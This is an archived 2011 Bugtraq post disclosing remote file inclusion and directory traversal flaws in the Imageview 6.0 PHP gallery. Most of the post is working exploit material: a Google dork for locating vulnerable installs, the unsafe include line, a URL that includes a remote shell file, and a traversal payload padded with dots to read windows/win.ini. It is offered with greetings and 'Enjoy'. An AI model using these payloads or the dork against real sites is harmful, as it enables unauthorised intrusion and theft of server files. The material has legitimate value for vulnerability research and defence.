'Imageview v6.0 Remote [and] Local Directory Traversal Vulnerability'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Imageview v6.0 Remote [and] Local Directory Traversal Vulnerability
From:       difficult-511 () hotmail ! com
Date:       2011-02-27 13:30:48
Message-ID: 201102271330.p1RDUmng016887 () www5 ! securityfocus ! com
[Download RAW message or body]

##########################################################
# Exploit Title: Imageview v6.0 Remote [and] Local Directory Traversal Vulnerability
# Google Dork: inurl:"/imageview6/"
# home : www.D99Y.com
# Date: 27/2/2011 
# Author: Difficult 511
# Software Link: http://www.blackdot.be/files/downloads/imageview6-install.zip
# Version: 6.0
# Tested on: windows xp sp2
##########################################################
#
# file :
#
# admin/index.php
#
# exploit [ Remote ] : 
#
# http://localhost/imageview6/admin/index.php?page= [shell.txt]
#
# Code : 
#
#<?php include('pages/'.$_GET['page'].'.php'); ?>
#
# exploit [ Local ] :
#
# http://localhost/imageview6/admin/index.php?page=unexisting/../../../../../../../../ \
../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
 #
# Now see the file :  /windows/win.ini
#
# And see Page ;)
#
##########################################################

Greetz : 

NassRawI and all members D99Y.com

Enjoy :)


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic